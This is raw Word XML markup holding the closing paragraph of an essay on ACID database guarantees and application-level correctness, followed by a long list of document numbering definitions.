        <w:t xml:space="preserve"> The four properties are not implementation details of the database engine; they are the preconditions for application-level correctness. An application that uses a non-atomic operation for a logically indivisible action has an application bug that the ACID guarantee cannot fix. An application that reads data outside a transaction and then acts on it inside a transaction has a consistency bug that no isolation level can prevent. An application that catches and ignores database exceptions has silently disabled durability for itself. The engineers who build genuinely reliable data-intensive systems understand that ACID is a contract between the database and the application — and that the application has obligations under that contract, not just the database. The database provides the mechanisms; the application must use them correctly. Most production data bugs — the double-charges, the lost orders, the inventory discrepancies — are not database bugs. They are application-level violations of the ACID contract: operations that should be atomic but aren't, consistency checks that happen outside of transactions, isolation levels that are weaker than the application's correctness requirements, and durability guarantees that are undermined by exception handling that treats "operation </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t>failed" as "operation succeeded." Understanding ACID deeply means understanding not just what the database guarantees but what you must do to actually receive those guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0EA3D8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Top of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6907A545" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Bottom of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3993B768" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00AD5AD3" w:rsidRDefault="00EF2B0F" w:rsidP="00AD5AD3"/>
    <w:sectPr w:rsidR="00EF2B0F" w:rsidRPr="00AD5A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6CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E716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4F8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E60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10166"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF12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432D70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE6E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4B7E65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7564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5732A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC26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725024"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5622E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8B6FCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FE4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8E7ECF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3672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053EA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66EE3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060137"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6101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0B30AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E2C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112883"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7249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1177C38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6978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3030B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA64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37459C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="592E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387A71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="216E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401749"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0C8C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1507A70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00E8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596515"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FA4C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15F4392"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D356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710AB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0634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8D2212"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8BE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9858FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7584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A704CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3606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AE18A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="798A3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1BC4338"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D700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C93A98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="226E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1CA444F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7738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0239E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A8E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1B0710"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FE2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2F70FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D8E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5361B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F464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5E0E98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="351E1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25F3160"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA36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5F3597"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4102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680546"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0776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680A95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E90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AC240D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A32E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D84609"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0156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F52B47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C18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34630C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42BC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35871F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B118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38F4636"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97FE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39360A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B072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3B73833"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E7E7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3BD18AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CED8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3E80B51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF908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3EA5223"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9068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4380265"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24F4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46B1D40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDD8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46B3A5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5AC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4764528"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC9E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47E7FBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FD6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4893E00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0F8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492757E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58C8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4A6745E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02805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4AC61A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F2A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4CE0D3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9FCA7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4D46E01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3BC5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4D92524"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43A8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4E85961"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46DC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4E91473"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="824A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4F962BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3925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5280B17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="561A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530300A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="619E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534537B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDCE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5511E67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2510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55D001E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BEC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57F78BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86B8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58F7B1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6B2A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5D44E0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B9DC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5E269D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BB0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5E54500"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C166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5E84C0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF02E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5EF53FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD82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5F066DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08D8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6093FB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDB0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613244E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1188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6203269"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="217CF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6231C9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA64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62D2F5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0ED6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62F6DD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C28B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64D6C32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F510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64F3450"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39EA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65A559B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE80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6657166"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A24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69657B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B7A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69F2902"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC62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6A05908"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94DC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6A22356"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C552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6A46E9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3850A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6B02DA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0A6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6B73C43"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E54F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06BC0885"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2788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06CE46AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B7A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6D00C23"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75B4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6D371D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="544C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6F506BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6AF01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07237911"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EA4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72A0D27"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="867A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72A7D0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05AA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73935BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F690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7545D13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA0A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76E29FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D28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7777F21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1EC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77B2DB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5932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77F5351"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0600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7921BB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1964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7DE08D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25F4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8171CE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43E4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81835E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFFE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83A5BAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89D89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084916CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="455A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84D2F7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="055AA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0853792F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BAC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8752477"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B50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8794C39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D82A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87F3349"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E760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08846D58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22A0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885018B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD86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88752C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48DA3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088D2AAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F974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8927019"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="686E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8AA0C3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C7F4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8E30C23"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5D4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8EE4E3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D238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91E6FE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="522E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921706D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="892A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9890E0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26E6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9913AA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80EC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9B505F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E240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9B91D3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6566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9BE5C60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DAC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9C155D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="121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9C1702B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F672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9D31C46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E232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A476504"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="417A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A5B7B49"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6D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A6329C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E9A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A906C91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BBC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A9951EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9DCE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AA76AE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15C6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AB16B3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA38D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0ACB3A22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B66A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AD957FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A70A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AEE732F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5810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AF50DD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07D8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B031CAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98A21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0B09168A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2D6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B0D2695"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C69E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B0E4B00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1980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B1B2A62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67CC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B2E25F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E5B4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B4507EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BD4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B6543A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="083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B7777CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65EC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BC94FE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B652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BEA308E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0196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C0303C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B367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0C135788"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D5A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C583C51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="742E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C5F571C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34249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0C6B299B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC46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C8163F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F4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C84454F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CEAD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C862645"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D27C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C9B4735"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4B4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CA426CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADFE5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0CBD7376"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6DCEE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0CBF223C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23F4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CEE3295"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="510E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D0236A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3FC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D05191D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B34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D09541C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBAE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D0F3B5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8DAA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D104515"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDC8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D297E74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4E29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D4E2A6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86DAD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0D5F37EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08167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0D610400"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C5C9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0D6228F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFBA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D6E78BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="613C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D7E4B0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8ACD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0D801DF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0806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D8F6289"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBC4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DB17036"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="540C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DB20AB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74CE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DB91FDC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D41C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DCE5BC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CD2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DD42D56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD86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E0C1675"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65AC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E191656"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A74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E1E523E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6A6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E1F00B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30FE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E7D7663"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07E4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0E866F0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07E8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E9A58E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DC6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EA44E30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F0C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0EA466EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50D4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0EBA17F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4B0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0ED70E3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F16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0F170D86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="097A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0F334C15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9E6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0F4B5A6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D52F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0F7D5FFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE58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0F973601"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2EC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FA71DE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB0C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0FBC5033"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E81E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0FD179EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1152C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0FE9232A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9240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0FF97998"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="157A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0FFE3412"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B132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02A401F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="523E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0511940"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B20C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063532B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B56A3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0652556"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D54A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109B307B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54F6C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10A41D21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7914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0D913CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88C4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0DD23CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3FA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0F543AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA22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1161AEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F35C9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1120290D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08B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1203C69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ABAA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1343077"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EC8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138494B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAA8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14700CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="236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1521C04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C26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164609E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C256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16A43B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0944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17B3C2E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C284C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117F74AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44E6A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11A46B90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5ED4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1BC01A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="166C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1C57540"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBF6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1C9035E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C14CF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11CD0D77"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="651E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1E5243F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FD26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1FF0DE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA204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122C5C84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD62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2381377"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E98C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2435947"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A182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24B6A8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA3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24F19EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA04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2550B45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B1C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2560EAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A110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25B6374"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F36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28D68B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9108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29D3319"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02F6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29F0BEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E31C6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12D53650"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1CA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2E802A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D316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2ED4A6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B56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2F20B4F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BA8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2F87254"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="973A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2FE51C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AF8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3060598"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A3C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30D7ABE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5432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31013C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E8AE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132B1C2E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1C0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3305D8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C85C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348607B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="211C6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134B5663"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7F62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1360791F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D908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3777336"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80D6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389235C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7288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39028E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88C2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39740F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22C09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13C80D55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="522A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3D5181B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF22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3DC14BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ABBA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3E2061A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7292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3FC5B24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D42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49E30D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52809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14A24AEE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90A8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4C50D30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13B8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4CC039D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9694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4E66FB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="147E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4ED70EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D6A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50763FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF3E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50A4FB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="034E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5120C07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31085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15384AA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C854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5580FD4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE74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5650AEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2062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57429CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCA67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15773CE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="516E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57B340C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA90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581374E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF28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5C142FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B2C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5D42CA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2B8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5E102D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C822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62C5533"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8724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1630637A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="215E7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16323EED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A746A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656120E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88D2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66302FC"/>
    <w:multiLevelType w:val="multilevel"/>
